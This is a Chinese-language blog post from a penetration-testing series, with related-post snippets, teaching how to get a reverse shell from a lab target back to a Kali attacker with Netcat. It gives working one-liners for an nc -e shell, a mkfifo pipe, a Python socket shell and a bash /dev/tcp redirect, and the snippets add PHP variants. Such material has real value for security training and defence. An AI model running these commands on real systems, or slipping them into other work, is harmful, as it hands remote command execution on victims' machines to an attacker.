提权(2), Netcat反弹shell

已于 2023-12-05 14:55:08 修改
阅读量265 收藏
点赞数
分类专栏: 渗透测试-入侵提权 文章标签: web安全 渗透测试
于 2023-12-03 21:41:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bua200720411091/article/details/134771004
版权

一, 简介

Netcat(nc)是一款网络工具,也被称为“瑞士军刀”,可以读写TCP或UDP网络连接,透过使用TCP或UDP协议的网络连接去读写数据.

它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,它能够建立你需要的几乎所有类型的网络连接Netcat可以用于端口探测、传输文本信息、传输文件/目录、远程电子取证信息收集、远程控制等常用操作

Netcat在Linux环境下常常是自带的,如果你使用的Linux发行版本没有这个工具也可以自行安装,比如在CentOS上的安装命令就是 yum install nc -y

二, 反弹shell实验

环境:

攻击端: 192.168.112.1, kali
目标端: 192.168.112.202

由攻击者监听, 从目标端反弹shell给攻击端.

nc反弹shell

攻击端监听 5555 端口:

nc -lvp 5555

目标端反弹shell:

方式1:

这行命令的作用是使用 Netcat(nc)工具在指定的 IP 地址和端口号上创建一个反向 shell。
具体来说,它将标准输入和标准输出重定向到指定的 TCP连接上,使得远程主机可以通过该连接执行命令并获取输出, 由nc执行bash, 回显给攻击端, 攻击端不显示提示符.

nc -e /bin/bash 192.168.112.1 5555

如果不能使用 -e 参数, 使用下面的代替:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.112.1 5555 >/tmp/f

如果要显示带提示符的交互式终端, 可以继续使用python创建虚拟终端:

python -c 'import pty;pty.spawn("/bin/bash")'

或者

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.112.1", 5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
方式2:

这行命令是一个反向 shell 的命令,它将一个 bash shell 连接到指定的 IP 地址和端口号上。
具体来说,它将标准输入和标准输出重定向到一个 TCP连接上,使得远程主机可以通过该连接执行命令并获取输出, 这种方式执行后, 攻击端会显示提示符.

bash -i >& /dev/tcp/192.168.112.1/5555 0>&1
其他方式

还可以使用 telnet, awk, python, php, java等都可以反弹shell.
加密的反弹shell可以使用openssl和mkfifo加密通道.

DeltaTime
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网隧道代理技术(五)之 Netcat反弹Shell
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-24 766
Netcat简称NC,是一个简单、可靠的网络工具,被誉为网络界的瑞士军刀。通NC可以进行端口扫描、反弹Shell、端口监听和文件传输等操作
netcat使用及反弹shell
Bu2n的博客
02-20 5152
Netcat反弹shell
Yy10205473的博客
01-14 577
Netcat反弹shell基础介绍使用python反弹shell应用场景使用方法当nc不支持-e时如何反弹shell应用场景使用方法 #应用场景 某些拿到服务器权限之后,想要设置一个反弹shell。但是目标服务器上没有安装nc时。 基础介绍 将liunx系统下的bash(shell)传递到window系统下的pc 反弹shell:bash -i >& /dev/tcp/IP地址/端口 0>&1 liunx主机连接window主机 bash -i :已交互模式运行bash she
netcat 反弹shell
weixin_40328085的博客
09-18 337
第一种情况:用 bash -i 客户机:netcat -l -p 7777 服务器(被黑主机):bash -i >& /dev/tcp/192.168.227.1/7777 0>&1 >& 后面跟上/dev/tcp/ip/port 这个文件代表将bash -i 的标准输出和标准错误输出 重定向到 这个文件(描述符)。(其实有点像个通道) 0&gt...
netcat反弹shell
qq_56414082的博客
08-11 279
在执行命令漏洞,一般的利用漏洞是执行反弹shell在进行其他操作。执行反弹shell的命令有许多。反弹shell因为是受害者,反向连接远程服务器,请求是内部到外部,所以防火墙是不会进行拦截的。
cmd反弹shell提权
10-24
### cmd反弹shell提权知识点详解 #### 一、概述 在网络安全领域,特别是渗透测试过程中,“cmd反弹shell提权”是一种常见的技术手段。通过这种方式,攻击者能够在远程目标机器上获得更高权限的访问控制,从而进一步...
Linux下NC反弹shell命令(推荐)
09-15
在网络安全渗透测试中,反弹Shell是一种常见的技术,它允许攻击者远程控制受感染的系统。在Linux环境中,网络工具`nc`(Netcat)常被用来创建这种连接。本篇文章将详细介绍如何在Linux下使用`nc`进行反弹Shell操作...
反弹shell1
08-03
在TCP反弹Shell中,攻击者首先在本地用`nc(netcat)`命令监听一个端口,如443端口,`nc -lvp 443`。然后在目标机器上,使用各种方法创建一个连接到攻击者IP和端口的Shell,例如: - 使用`awk`命令创建TCP连接并...
Linux提权思路+实战 _ Mugen1
08-03
例如,通过反弹shell技术,当仅有一个低权限webshell时,攻击者可以使用netcat工具开启本地监听,然后在目标主机上执行反弹shell命令,将shell连接回本地。`bash -i >& /dev/tcp/192.168.1.1/8080 0>&1` 是一个典型...
NC提权详细教程
12-04
NC提权 详细教程附带CMD命令 NC反弹 然后进行查看端口 netstat -an 进行连接 cd\ cd 360rec quert user C:\360Rec\churrasco.exe "logoff id" churrasco.exe "net user yuqing1453 4520829 /add" churrasco.exe "net localgroup administrators add /add" 首先执行命令 CMD。EXE 现在来执行NC命令 连接 本地远程访问反弹 就用这个吧~~ 换一个 命令成功完成。 这个YUQING1453是我之前的 命令成功完成。
命令执行nc的用法提权
04-20
这个文档是关于内核2.6.18-194.el5的提权,利用的是nc命令
32+64位socat,Android版,arm+arm64,android手机可用,android反向shell工具
最新发布
04-16
其功能与有瑞士军刀之称的 Netcat 类似,可以看做是 Netcat 的加强版。 Socat 的主要特点就是在两个数据流之间建立通道,且支持众多协议和链接方式。如 IP、TCP、 UDP、IPv6、PIPE、EXEC、System、Open、Proxy、...
【工具】Netcat(2)反弹shell
爱美食的Geek
02-21 2946
应用场景:某些拿到服务器权限之后,想要设置一个反弹shell。但是目标服务器上没有安装Netcat时。 1.反弹shell(bash) 反弹shell命令:bash -i >& /dev/tcp/ip/port 0>&1 pc接受netcat命令:nc -lvp port bash -i表示以交互模式运行bash shell。重定向符>&,如果在其后加文...
反弹shell的方法和场景
weixin_45653478的博客
04-01 1285
nc64.exe -lvvp 1111 -e C:\Windows\System32\cmd.exe windows机器nc64.exe -lvvp 1111 -e /bin/bash linux机器。
常用反弹 shell 方式总结
未完成的歌~的博客
03-07 5472
反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。
各种反弹shell方式
m0_58606546的博客
11-17 2296
1、Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: 1 bash -i >& /dev/tcp/121.40.248.82/1234 0>&1 1 /bin/bash -i > /dev/tcp/121.40.248.82/1234 0<& 2>&1 1 exec 5<>/dev/tcp/10.10.10.11/443;ca.
【转】反弹Shell,看这一篇就够了
热门推荐
mastergu2的博客
10-26 2万+
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
用nc反弹shell真有意思哈哈
公众号shadow sock7
06-17 1万+
先在bee(192.168.170.130)上面bee@bee-box:/tmp$ nc -vlp 4444 -e /bin/bash listening on [any] 4444 ... 192.168.170.1: inverse host lookup failed: Unknown host connect to [192.168.170.130] from (UNKNOWN) [192.
反弹shell常用命令
07-30
反弹shell是指通过一台远程主机将命令行控制权返回到本地主机上。常见的反弹shell命令包括: 1. Netcat反弹shell: ``` 本地监听:nc -lvp <本地端口号> 远程连接:nc <本地IP地址> <本地端口号> -e /bin/bash ``` 2. Bash反弹shell: ``` bash -i >& /dev/tcp/<本地IP地址>/<本地端口号> 0>&1 ``` 3. Python反弹shell: ``` python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<本地IP地址>",<本地端口号>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` 4. PHP反弹shell: ``` php -r '$sock=fsockopen("<本地IP地址>",<本地端口号>);exec("/bin/sh -i <&3 >&3 2>&3");' ``` 请注意,在实际使用中请合法合规,切勿用于非法用途。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值